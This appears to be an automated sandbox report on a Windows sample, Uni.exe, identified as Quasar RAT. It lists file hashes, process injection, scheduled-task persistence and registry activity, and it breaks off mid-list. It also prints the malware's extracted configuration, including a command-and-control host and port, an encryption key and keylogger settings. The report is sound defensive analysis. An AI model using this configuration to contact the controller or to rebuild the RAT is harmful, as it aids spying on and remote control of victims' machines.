Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1800s -
max time network
1801s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
08/05/2024, 17:28
Behavioral task
behavioral1
Sample
Uni.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.exe
Resource
win7-20240419-en
Behavioral task
behavioral3
Sample
Uni.exe
Resource
win10v2004-20240508-en
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
7417c8c73e614f293152575f46134216
-
SHA1
cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
-
SHA256
00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
-
SHA512
897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
SSDEEP
6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-dOMA5C0pQTTpKjVsCp
-
encryption_key
UBXs44u6E81wxBGZxQHk
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-KEYLOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
resource yara_rule behavioral3/memory/1724-1-0x0000000000C20000-0x0000000000C8C000-memory.dmp family_quasar behavioral3/files/0x0007000000023278-11.dat family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4000 created 616 4000 powershell.EXE 5 PID 4048 created 616 4048 powershell.EXE 5 -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 1080 $sxr-powershell.exe 2640 install.exe 1540 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 13 raw.githubusercontent.com 14 raw.githubusercontent.com 23 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4000 set thread context of 3548 4000 powershell.EXE 98 PID 4048 set thread context of 644 4048 powershell.EXE 99 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2968 schtasks.exe 4032 SCHTASKS.exe 3928 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715200331" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE -
Modifies registry class 18 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\02154e2a-0877-4f75 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = "\\\\?\\Volume{5110105B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\61ce182754cb053782d39cc890128cbada84ad6c7640c6ba0c541165d6407a54" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = df81a09a86a1da01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000223c589986a1da014592719a86a1da014592719a86a1da01530400000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a858d5a32000363163653138323735346362303533373832643339636338393031323863626164613834616436633736343063366261306335343131363564363430376135340000b20009000400efbea858d5a3a858d5a32e0000000000000000000000000000000000000000000000000092303e00360031006300650031003800320037003500340063006200300035003300370038003200640033003900630063003800390030003100320038006300620061006400610038003400610064003600630037003600340030006300360062006100300063003500340031003100360035006400360034003000370061003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000025e0f5e81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36316365313832373534636230353337383264333963633839303132386362616461383461643663373634306336626130633534313136356436343037613534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736e667667716c750000000000000000a40a9b40716b2445984d9ed1edd3eb7cd736ae6c2f0def1192f1d6aa8b0874bda40a9b40716b2445984d9ed1edd3eb7cd736ae6c2f0def1192f1d6aa8b0874bdd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003500350038003200390034003800360035002d0033003600370033003800340034003300350034002d0032003200350035003400340034003900330039002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005b101051000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = "8324" RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4000 powershell.EXE 4000 powershell.EXE 4048 powershell.EXE 4048 powershell.EXE 4000 powershell.EXE 3548 dllhost.exe 3548 dllhost.exe 3548 dllhost.exe 3548 dllhost.exe 4048 powershell.EXE 3548 dllhost.exe 3548 dllhost.exe 4048 powershell.EXE 3548 dllhost.exe 3548 dllhost.exe 3548 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe 644 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1724 Uni.exe Token: SeDebugPrivilege 4000 powershell.EXE Token: SeDebugPrivilege 1080 $sxr-powershell.exe Token: SeDebugPrivilege 4048 powershell.EXE Token: SeDebugPrivilege 4000 powershell.EXE Token: SeDebugPrivilege 3548 dllhost.exe Token: SeDebugPrivilege 4048 powershell.EXE Token: SeDebugPrivilege 644 dllhost.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 3564 Explorer.EXE Token: SeCreatePagefilePrivilege 3564 Explorer.EXE Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 3564 Explorer.EXE Token: SeCreatePagefilePrivilege 3564 Explorer.EXE Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 3564 Explorer.EXE Token: SeCreatePagefilePrivilege 3564 Explorer.EXE Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 3564 Explorer.EXE Token: SeCreatePagefilePrivilege 3564 Explorer.EXE Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeShutdownPrivilege 3564 Explorer.EXE Token: SeCreatePagefilePrivilege 3564 Explorer.EXE Token: SeShutdownPrivilege 3564 Explorer.EXE Token: SeCreatePagefilePrivilege 3564 Explorer.EXE Token: SeShutdownPrivilege 3564 Explorer.EXE Token: SeCreatePagefilePrivilege 3564 Explorer.EXE Token: SeShutdownPrivilege 3564 Explorer.EXE Token: SeCreatePagefilePrivilege 3564 Explorer.EXE Token: SeShutdownPrivilege 3564 Explorer.EXE Token: SeCreatePagefilePrivilege 3564 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1080 $sxr-powershell.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3564 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1724 wrote to memory of 2968 1724 Uni.exe 84 PID 1724 wrote to memory of 2968 1724 Uni.exe 84 PID 1724 wrote to memory of 2968 1724 Uni.exe 84 PID 1724 wrote to memory of 1080 1724 Uni.exe 86 PID 1724 wrote to memory of 1080 1724 Uni.exe 86 PID 1724 wrote to memory of 1080 1724 Uni.exe 86 PID 1724 wrote to memory of 2640 1724 Uni.exe 87 PID 1724 wrote to memory of 2640 1724 Uni.exe 87 PID 1724 wrote to memory of 2640 1724 Uni.exe 87 PID 1724 wrote to memory of 4032 1724 Uni.exe 88 PID 1724 wrote to memory of 4032 1724 Uni.exe 88 PID 1724 wrote to memory of 4032 1724 Uni.exe 88 PID 1080 wrote to memory of 3928 1080 $sxr-powershell.exe 93 PID 1080 wrote to memory of 3928 1080 $sxr-powershell.exe 93 PID 1080 wrote to memory of 3928 1080 $sxr-powershell.exe 93 PID 1080 wrote to memory of 1540 1080 $sxr-powershell.exe 95 PID 1080 wrote to memory of 1540 1080 $sxr-powershell.exe 95 PID 1080 wrote to memory of 1540 1080 $sxr-powershell.exe 95 PID 4000 wrote to memory of 3548 4000 powershell.EXE 98 PID 4000 wrote to memory of 3548 4000 powershell.EXE 98 PID 4000 wrote to memory of 3548 4000 powershell.EXE 98 PID 4000 wrote to memory of 3548 4000 powershell.EXE 98 PID 4000 wrote to memory of 3548 4000 powershell.EXE 98 PID 4000 wrote to memory of 3548 4000 powershell.EXE 98 PID 4000 wrote to memory of 3548 4000 powershell.EXE 98 PID 4000 wrote to memory of 3548 4000 powershell.EXE 98 PID 3548 wrote to memory of 616 3548 dllhost.exe 5 PID 3548 wrote to memory of 676 3548 dllhost.exe 7 PID 3548 wrote to memory of 948 3548 dllhost.exe 12 PID 3548 wrote to memory of 60 3548 dllhost.exe 13 PID 3548 wrote to memory of 512 3548 dllhost.exe 14 PID 3548 wrote to memory of 944 3548 dllhost.exe 15 PID 3548 wrote to memory of 1052 3548 dllhost.exe 16 PID 3548 wrote to memory of 1088 3548 dllhost.exe 17 PID 3548 wrote to memory of 1132 3548 dllhost.exe 19 PID 3548 wrote to memory of 1168 3548 dllhost.exe 20 PID 3548 wrote to memory of 1260 3548 dllhost.exe 21 PID 3548 wrote to memory of 1312 3548 dllhost.exe 22 PID 3548 wrote to memory of 1428 3548 dllhost.exe 23 PID 3548 wrote to memory of 1440 3548 dllhost.exe 24 PID 3548 wrote to memory of 1456 3548 dllhost.exe 25 PID 3548 wrote to memory of 1504 3548 dllhost.exe 26 PID 3548 wrote to memory of 1512 3548 dllhost.exe 27 PID 3548 wrote to memory of 1672 3548 dllhost.exe 28 PID 3548 wrote to memory of 1708 3548 dllhost.exe 29 PID 3548 wrote to memory of 1764 3548 dllhost.exe 30 PID 3548 wrote to memory of 1800 3548 dllhost.exe 31 PID 3548 wrote to memory of 1904 3548 dllhost.exe 32 PID 3548 wrote to memory of 1160 3548 dllhost.exe 33 PID 3548 wrote to memory of 1448 3548 dllhost.exe 34 PID 3548 wrote to memory of 1544 3548 dllhost.exe 35 PID 3548 wrote to memory of 1692 3548 dllhost.exe 36 PID 3548 wrote to memory of 2092 3548 dllhost.exe 